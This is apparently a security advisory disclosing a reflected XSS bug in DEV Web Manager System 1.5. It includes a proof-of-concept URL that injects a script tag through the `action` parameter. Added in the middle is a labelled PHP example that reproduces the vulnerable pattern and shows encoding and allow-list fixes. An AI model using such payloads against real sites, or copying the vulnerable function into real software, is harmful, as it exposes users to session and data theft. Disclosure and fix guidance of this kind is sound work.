{x0n3-h4ck} DEV Web Manager System <= 1.5 XSS Exploit

-=[----------------------ADVISORY----------------------]=-
-=[                                                    ]=-
-=[          DEV Web Manager System <= 1.5             ]=-
-=[                                                    ]=-
-=[       Author: CorryL [corryl80@gmail.com]          ]=-
-=[               www.x0n3-h4ck.org                    ]=-
-=[----------------------------------------------------]=-


-=[+] Application:    DEV Web Manager System
-=[+] Version:        1.5
-=[+] Vendor's URL:   http://dev-wms.sourceforge.net/
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       cross-site scripting [XSS]
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:         CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:      www.x0n3-h4ck.org


..::[ Description ]::..

DEV Web Manager System is a PHP-based web application.


..::[ Bug ]::..

This system is affected by a cross-site scripting (XSS) bug: the `action`
parameter of index.php is reflected into the page without encoding.
An attacker can use the bug to steal sensitive information from users
or from the administrator.


..::[ Proof Of Concept ]::..

http://web site/index.php?session=0&action=>"><ScRiPt%20%0a%0d>alert(775195196)%3B</ScRiPt>
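The bug class the proof of concept above exercises, as an added example that is not code from the advisory or from DEV Web Manager System: a small PHP script that reflects the `action` parameter into an HTML attribute the way the PoC URL suggests, beside the same output with context-aware encoding and with the parameter checked against an allow-list of known actions. The form markup, the function names and the set of allowed actions are assumptions; the project's real index.php was not inspected, so the exact injection context there may differ.

```php
<?php
// Added example, not code from the advisory or from DEV Web Manager System.
// It reproduces the bug class the advisory describes (the `action` query
// parameter reflected unencoded into index.php's HTML) in a self-contained
// script, then shows two fixes. The markup, the function names and the
// allow-list of actions are assumptions; the real index.php was not inspected.

declare(strict_types=1);

// Vulnerable pattern: the raw parameter lands inside a quoted attribute, so
// a value starting with `">` closes the attribute and the tag, and whatever
// follows is parsed by the browser as markup.
function render_action_vulnerable(string $action): string
{
    return '<form method="get" action="index.php">'
         . '<input type="hidden" name="action" value="' . $action . '">'
         . '</form>';
}

// Fix 1: encode for the HTML attribute context at the point of output.
// ENT_QUOTES covers both quote characters; ENT_SUBSTITUTE keeps invalid
// UTF-8 from turning the whole output into an empty string.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_action_encoded(string $action): string
{
    return '<form method="get" action="index.php">'
         . '<input type="hidden" name="action" value="' . html_attr($action) . '">'
         . '</form>';
}

// Fix 2 (defence in depth): `action` is a dispatch selector, so it should
// only ever be one of a fixed set. Anything else is rejected before it is
// used, whether for dispatch or for display. The set below is assumed.
const ALLOWED_ACTIONS = ['list', 'view', 'edit', 'logout'];

function validated_action(?string $raw): string
{
    if ($raw === null || !in_array($raw, ALLOWED_ACTIONS, true)) {
        return 'list'; // default action, never the caller-supplied string
    }
    return $raw;
}

// Constructed input: the advisory's proof-of-concept parameter as PHP sees it
// in $_GET['action'] after URL decoding (%20 -> space, %0a%0d -> LF CR, %3B -> ;).
$poc = '>"><ScRiPt ' . "\n\r" . '>alert(775195196);</ScRiPt>';

$vulnerable = render_action_vulnerable($poc);
$encoded    = render_action_encoded($poc);
$validated  = render_action_encoded(validated_action($poc));

// Self-check so the script fails loudly if the encoding does not do its job.
$ok = stripos($vulnerable, '<script') !== false    // live tag in the raw output
   && stripos($encoded, '<script') === false        // none after encoding ...
   && strpos($encoded, '&lt;ScRiPt') !== false      // ... because < became &lt;
   && strpos($encoded, '&quot;') !== false          // ... and " became &quot;
   && $validated === render_action_encoded('list'); // allow-list fell back to default
if (!$ok) {
    fwrite(STDERR, "self-check failed\n");
    exit(1);
}

echo "vulnerable: $vulnerable\n";
echo "encoded:    $encoded\n";
echo "validated:  $validated\n";
```

Run it with the PHP CLI (`php xss_fix_example.php`); it exits non-zero if either fix fails to neutralise the constructed payload. Encoding at output is the fix that closes this bug regardless of what the parameter contains; the allow-list is the design change that stops a dispatch parameter from being displayable attacker-controlled text in the first place. Note that the encoding must match the context: `html_attr` is right for an attribute value, but a value reflected into a `<script>` block or a URL needs a different encoder.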


..::[ Workaround ]::..

Nothing

..::[ Disclosure Timeline ]::..

[07/10/2006] - Vendor notification
[11/10/2006] - Vendor response
[17/10/2006] - No patch released by vendor
[17/10/2006] - Public disclosure

